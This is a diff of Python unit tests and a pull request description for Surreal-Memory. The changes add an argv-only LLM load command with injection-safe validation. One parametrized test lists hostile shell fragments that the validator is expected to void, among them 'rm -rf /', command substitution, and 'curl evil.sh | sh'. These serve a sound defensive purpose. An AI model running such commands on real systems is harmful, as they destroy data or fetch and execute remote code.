+            ["llamastash-load.py", "gemma-4-12b"],
+            ["llamastash-stop.py", "gemma-4-12b"],
+        ], "release() must still fire even though the load command raised"
+
     async def test_the_load_command_is_argv_not_a_shell_string(
         self, acquiring_namer_factory
     ) -> None:

--- a/tests/unit/test_reasoning_naming.py
+++ b/tests/unit/test_reasoning_naming.py
@@ -225,6 +225,28 @@ def releasing_namer_factory(monkeypatch: pytest.MonkeyPatch):
     return _make
 
 
+@pytest.fixture
+def acquiring_namer_factory(monkeypatch: pytest.MonkeyPatch):
+    """A namer configured with a load command plus a recording runner."""
+    monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+
+    def _make(*responses: Any, runner: _Runner | None = None) -> tuple[Any, _Transport, _Runner]:
+        transport = _Transport(*responses)
+        run = runner or _Runner()
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma-4-12b",
+                distill_llm_load_cmd=("llamastash-load.py", "{model}", "--ngl", "99"),
+            ),
+            post_json=transport,
+            run_command=run,
+        )
+        assert namer is not None
+        return namer, transport, run
+
+    return _make
+
+
 class TestSuccessfulRename:
     async def test_prose_is_replaced_by_the_model_output(self, namer_factory) -> None:
         namer, _ = namer_factory(_completion(_good_json()))
@@ -641,3 +663,117 @@ class TestRelease:
         await namer.release()
 
         assert runner.calls == []
+
+
+class TestAcquire:
+    """Explicit model loading before the first request (run 010 / section E, U6).
+
+    Symmetric with TestRelease: acquire() is the other half of the same
+    load/unload lifecycle, so a run that explicitly loads must still clean up
+    even if it never actually renamed anything.
+    """
+
+    async def test_no_load_command_configured_is_a_no_op(self, releasing_namer_factory) -> None:
+        """releasing_namer_factory has no load_cmd -- acquire() must touch nothing."""
+        namer, _transport, runner = releasing_namer_factory()
+
+        await namer.acquire()
+
+        assert runner.calls == [], "nothing configured, so nothing may run"
+
+    async def test_a_successful_load_runs_the_command_with_model_substituted(
+        self, acquiring_namer_factory
+    ) -> None:
+        namer, _transport, runner = acquiring_namer_factory()
+
+        await namer.acquire()
+
+        assert runner.calls == [["llamastash-load.py", "gemma-4-12b", "--ngl", "99"]]
+
+    async def test_a_successful_load_is_cleaned_up_even_with_no_rename_call(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """The exact leak U6 exists to close: acquire() loads a model that
+        rename() is never called for (e.g. zero patterns to name this run) --
+        release() must still unload it, not skip cleanup because
+        _model_in_use looks like nothing happened.
+        """
+        monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+        run = _Runner()
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma-4-12b",
+                distill_llm_load_cmd=("llamastash-load.py", "{model}"),
+                distill_llm_unload_cmd=("llamastash-stop.py", "{model}"),
+            ),
+            post_json=_Transport(),
+            run_command=run,
+        )
+        assert namer is not None
+
+        await namer.acquire()
+        await namer.release()
+
+        assert run.calls == [
+            ["llamastash-load.py", "gemma-4-12b"],
+            ["llamastash-stop.py", "gemma-4-12b"],
+        ]
+
+    async def test_acquire_is_idempotent(self, acquiring_namer_factory) -> None:
+        namer, _transport, runner = acquiring_namer_factory()
+
+        await namer.acquire()
+        await namer.acquire()
+        await namer.acquire()
+
+        assert len(runner.calls) == 1
+
+    @pytest.mark.parametrize(
+        "runner",
+        [_Runner(exit_code=1), _Runner(raises=FileNotFoundError("no such command"))],
+        ids=["non-zero-exit", "command-missing"],
+    )
+    async def test_a_failing_load_never_raises_and_naming_still_works(
+        self, monkeypatch: pytest.MonkeyPatch, runner: _Runner
+    ) -> None:
+        """A load command is an optimization; its failure must fall back to
+        the endpoint's implicit load-on-first-request, not break distillation.
+        """
+        monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma-4-12b",
+                distill_llm_load_cmd=("llamastash-load.py", "{model}"),
+            ),
+            post_json=_Transport(_completion(_good_json())),
+            run_command=runner,
+        )
+        assert namer is not None
+
+        await namer.acquire()  # must not raise
+        renamed = await namer.rename(_pattern(), _traces())
+
+        assert renamed["title"] == "Read before editing"
+
+    async def test_the_load_command_is_argv_not_a_shell_string(
+        self, acquiring_namer_factory
+    ) -> None:
+        """No shell means no quoting bugs and no injection via a model name."""
+        namer, _transport, runner = acquiring_namer_factory()
+
+        await namer.acquire()
+
+        argv = runner.calls[0]
+        assert isinstance(argv, list)
+        assert all(isinstance(part, str) for part in argv)
+        assert not any(";" in part or "|" in part or "&&" in part for part in argv)
+
+    async def test_acquire_does_not_itself_call_the_chat_endpoint(
+        self, acquiring_namer_factory
+    ) -> None:
+        """acquire() only runs the load command; it must not send a chat request."""
+        namer, transport, _runner = acquiring_namer_factory()
+
+        await namer.acquire()
+
+        assert transport.calls == []

--- a/tests/unit/test_reasoning_naming.py
+++ b/tests/unit/test_reasoning_naming.py
@@ -24,6 +24,7 @@ import pytest
 
 from surreal_memory.engine.reasoning_naming import (
     LLM_ENDPOINT_ENV,
+    _run_command_subprocess,
     build_namer,
     resolve_llm_endpoint,
 )
@@ -664,6 +665,36 @@ class TestRelease:
 
         assert runner.calls == []
 
+    async def test_a_model_name_the_argv_allowlist_rejects_voids_the_unload(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """distill_llm_model is sanitized against a looser charset (spaces,
+
+        globs) than the argv template it gets substituted into, since it is
+        constructed directly here (bypassing ReasoningTrainingConfig.from_dict's
+        own sanitization) to simulate a value that already cleared that looser
+        check. Substitution must be re-validated afterward: a model name
+        containing a space voids the whole command rather than reaching
+        create_subprocess_exec with an argv element the allowlist would have
+        rejected on its own.
+        """
+        monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+        runner = _Runner()
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma 4 12b",
+                distill_llm_unload_cmd=("llamastash", "stop", "{model}"),
+            ),
+            post_json=_Transport(_completion(_good_json())),
+            run_command=runner,
+        )
+        assert namer is not None
+
+        await namer.rename(_pattern(), _traces())
+        await namer.release()
+
+        assert runner.calls == []
+
 
 class TestAcquire:
     """Explicit model loading before the first request (run 010 / section E, U6).
@@ -811,3 +842,51 @@ class TestAcquire:
         await namer.acquire()
 
         assert transport.calls == []
+
+    async def test_a_model_name_the_argv_allowlist_rejects_voids_the_load(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Symmetric with the same check in TestRelease -- see that test's
+
+        docstring for why a directly-constructed config can carry a model
+        name the argv allowlist would reject.
+        """
+        monkeypatch.setenv(LLM_ENDPOINT_ENV, LOOPBACK)
+        runner = _Runner()
+        namer = build_namer(
+            _config(
+                distill_llm_model="gemma*12b",
+                distill_llm_load_cmd=("llamastash-load.py", "{model}"),
+            ),
+            post_json=_Transport(),
+            run_command=runner,
+        )
+        assert namer is not None
+
+        await namer.acquire()
+
+        assert runner.calls == []
+
+
+class TestRealSubprocessRunner:
+    """Every load/acquire/release test above injects a fake run_command, so
+
+    none of them exercise the actual production code path:
+    _run_command_subprocess's real asyncio.create_subprocess_exec + wait_for
+    + kill/wait cleanup. Locks that path in directly, since it is the
+    resource-cleanup-sensitive part a fake can't verify.
+    """
+
+    async def test_a_hung_command_is_killed_and_reaped_on_timeout(self) -> None:
+        with pytest.raises(TimeoutError):
+            await _run_command_subprocess(["sleep", "5"], timeout=0.2)
+
+    async def test_a_quick_command_returns_its_real_exit_code(self) -> None:
+        code = await _run_command_subprocess(["true"], timeout=5.0)
+
+        assert code == 0
+
+    async def test_a_failing_command_returns_its_real_nonzero_exit_code(self) -> None:
+        code = await _run_command_subprocess(["false"], timeout=5.0)
+
+        assert code == 1

--- a/tests/unit/test_unified_config.py
+++ b/tests/unit/test_unified_config.py
@@ -649,3 +649,107 @@ class TestReasoningTrainingConfig:
 
         assert cfg.reasoning_training.mining_enabled is True
         assert cfg.reasoning_training.mining_models == ("x-*",)
+
+
+class TestDistillCmdValidation:
+    """Argv validation for distill_llm_unload_cmd / distill_llm_load_cmd (run 010 / U6).
+
+    Both fields share the exact same parsing block in
+    ReasoningTrainingConfig.from_dict -- parametrized so a change to one
+    cannot silently stop covering the other.
+    """
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    def test_default_is_empty(self, field: str) -> None:
+        assert getattr(ReasoningTrainingConfig(), field) == ()
+        assert getattr(ReasoningTrainingConfig.from_dict({}), field) == ()
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    def test_safe_argv_with_model_placeholder_is_accepted(self, field: str) -> None:
+        rt = ReasoningTrainingConfig.from_dict(
+            {field: ["/usr/local/bin/llamastash-load.py", "{model}", "--ngl", "99"]}
+        )
+        assert getattr(rt, field) == (
+            "/usr/local/bin/llamastash-load.py",
+            "{model}",
+            "--ngl",
+            "99",
+        )
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    @pytest.mark.parametrize(
+        "dangerous_part",
+        [
+            "rm -rf / #",
+            "$(whoami)",
+            "`id`",
+            "cmd; rm -rf /",
+            "cmd && curl evil.sh | sh",
+            "cmd | tee /etc/passwd",
+            "cmd > /etc/passwd",
+            "cmd\nrm -rf /",
+            "'quoted'",
+            '"quoted"',
+        ],
+        ids=[
+            "space-and-hash",
+            "command-substitution",
+            "backtick",
+            "semicolon-chain",
+            "and-pipe-chain",
+            "pipe",
+            "redirect",
+            "newline",
+            "single-quote",
+            "double-quote",
+        ],
+    )
+    def test_a_dangerous_part_voids_the_whole_command(
+        self, field: str, dangerous_part: str
+    ) -> None:
+        """One unsafe part must void the whole command, not be silently dropped.
+
+        A half-parsed load/unload command is worse than none: it could run a
+        truncated argv that does something other than what was configured.
+        """
+        rt = ReasoningTrainingConfig.from_dict({field: ["llamastash", dangerous_part, "{model}"]})
+        assert getattr(rt, field) == ()
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    def test_more_than_16_parts_is_truncated_not_rejected(self, field: str) -> None:
+        """Parts beyond the cap are dropped; the first 16 safe parts still load."""
+        parts = [f"part{i}" for i in range(20)]
+        rt = ReasoningTrainingConfig.from_dict({field: parts})
+        assert getattr(rt, field) == tuple(parts[:16])
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    def test_an_empty_part_voids_the_whole_command(self, field: str) -> None:
+        rt = ReasoningTrainingConfig.from_dict({field: ["llamastash", "", "{model}"]})
+        assert getattr(rt, field) == ()
+
+    @pytest.mark.parametrize(
+        "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
+    )
+    def test_non_list_value_is_ignored(self, field: str) -> None:
+        rt = ReasoningTrainingConfig.from_dict({field: "llamastash stop {model}"})
+        assert getattr(rt, field) == ()
+
+    def test_load_and_unload_round_trip_independently_through_to_dict(self) -> None:
+        rt = ReasoningTrainingConfig(
+            distill_llm_unload_cmd=("llamastash-stop.py", "{model}"),
+            distill_llm_load_cmd=("llamastash-load.py", "{model}", "--ngl", "99"),
+        )
+        reloaded = ReasoningTrainingConfig.from_dict(rt.to_dict())
+        assert reloaded.distill_llm_unload_cmd == rt.distill_llm_unload_cmd
+        assert reloaded.distill_llm_load_cmd == rt.distill_llm_load_cmd
+        assert reloaded == rt

--- a/tests/unit/test_unified_config.py
+++ b/tests/unit/test_unified_config.py
@@ -724,11 +724,18 @@ class TestDistillCmdValidation:
     @pytest.mark.parametrize(
         "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]
     )
-    def test_more_than_16_parts_is_truncated_not_rejected(self, field: str) -> None:
-        """Parts beyond the cap are dropped; the first 16 safe parts still load."""
+    def test_more_than_16_parts_voids_the_whole_command(self, field: str) -> None:
+        """A too-long command is voided outright, not silently truncated.
+
+        Matches the same "invalid = void the whole command, never a
+        half-parsed substitute" contract as an unsafe part (see
+        test_a_dangerous_part_voids_the_whole_command above) -- truncating to
+        the first 16 parts would run a shorter, functionally different
+        command with no signal that anything was dropped.
+        """
         parts = [f"part{i}" for i in range(20)]
         rt = ReasoningTrainingConfig.from_dict({field: parts})
-        assert getattr(rt, field) == tuple(parts[:16])
+        assert getattr(rt, field) == ()
 
     @pytest.mark.parametrize(
         "field", ["distill_llm_unload_cmd", "distill_llm_load_cmd"], ids=["unload", "load"]

--- a/vscode-extension/package-lock.json
+++ b/vscode-extension/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "surrealmemory",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "surrealmemory",
-      "version": "2.17.0",
+      "version": "2.18.0",
       "license": "MIT",
       "dependencies": {
         "cytoscape": "^3.33.1",

--- a/vscode-extension/package.json
+++ b/vscode-extension/package.json
@@ -2,7 +2,7 @@
   "name": "surrealmemory",
   "displayName": "Surreal-Memory",
   "description": "Visual brain explorer, inline recall, and memory management for Surreal-Memory",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "publisher": "ai-flow-nowak",
   "license": "MIT",
   "preview": true,


### PR DESCRIPTION
## Summary

`consolidation_ratio` measures the fraction of fibers that reached SEMANTIC. Five
independent defects each, separately, kept fibers from ever reaching it or kept the
report from explaining why it wasn't moving:

- **Misleading remedies.** `smem_health`'s penalty text, `smem_stats`' low-consolidation
  hint, and the `NO_CONSOLIDATION` warning all pointed at `smem consolidate` — which does
  not move this metric. All three now name the real mechanism (spaced recall) and say
  explicitly that `consolidate` won't move it alone.
- **Rehearsal coverage capped at 10, twice over.** Recall's reinforcement step had two
  independent, redundant caps limiting it to the first 10 activated neurons regardless of
  how many a recall actually touched. Both fixed; the neuron-side cap is now a configurable
  `brain.reinforcement_neuron_limit` (default 15, set from a live measurement against the
  production storage backend, not assumed).
- **Merge erased maturation progress.** `consolidate --strategy merge` deleted source
  fibers and wrote a new one with no maturation record at all — a fiber one reinforcement
  from SEMANTIC came back at stage STM after a merge. Merged fibers now inherit the higher
  stage, the deduplicated union of reinforcement timestamps, and the oldest stage-entry time
  across their sources.
- **Reports didn't explain themselves.** `stages_advanced` is now broken down by hop
  (`stm→working`/`working→episodic`/`episodic→semantic`, summing to the same total).
  `smem_health` now surfaces `stage_distribution` and `semantic_gate_blockers` (which
  EPISODIC fibers are blocked on dwell time vs. reinforcement spacing vs. already-ready).
  A real bug found along the way: `smem evolution`'s own gate classifier duplicated this
  threshold logic and ignored the rehearsal-count alternative path entirely — fixed by
  extracting one shared classifier both diagnostics now use.
- **Distillation had no explicit GPU load.** `distill_llm_unload_cmd` (2.17.0) releases the
  chat model at the end of a run; loading was still implicit. New, symmetric
  `distill_llm_load_cmd` loads the model once before the first request, same argv-only
  execution and fail-soft contract as unload.

An independent security review of the load/unload argv handling found and this PR fixes:
a config value substituted into the argv template after validation wasn't re-checked
against the stricter argv allowlist, a too-long command was silently truncated instead of
voided, and a debug log line mislabeled load-command output as unload output.

Promotion thresholds (`_MIN_DISTINCT_DAYS`, `_MIN_REHEARSAL_COUNT`) are untouched by design.

Version bumped to 2.18.0 (MINOR — backward-compatible additions, `stages_advanced` keeps
its existing meaning).

## Test plan

- [x] `uv run make verify` (lint, format, mypy, full test suite, coverage ≥67%, security scan) — green
- [x] Three VALIDATE-FIRST tests written before any fix, confirmed failing on `main` for the right reason (merge losing maturation, rehearsal capped at 10, `stages_advanced` not broken out by hop)
- [x] Unit + integration coverage for every fix, including two real bugs found during independent review (adversarial python-reviewer and database-reviewer findings) and the security-review findings above
- [x] Live verification against a real SurrealDB backend: all 7 user-story scenarios pass end-to-end through the actual `DiagnosticsEngine`/`ConsolidationEngine` code paths (not mocks)
- [x] Live measurement of the rehearsal-coverage cost against the production storage backend, driving the shipped default
- [x] Independent security review of the new subprocess/argv-handling code (0 CRITICAL/HIGH; all findings fixed in this PR)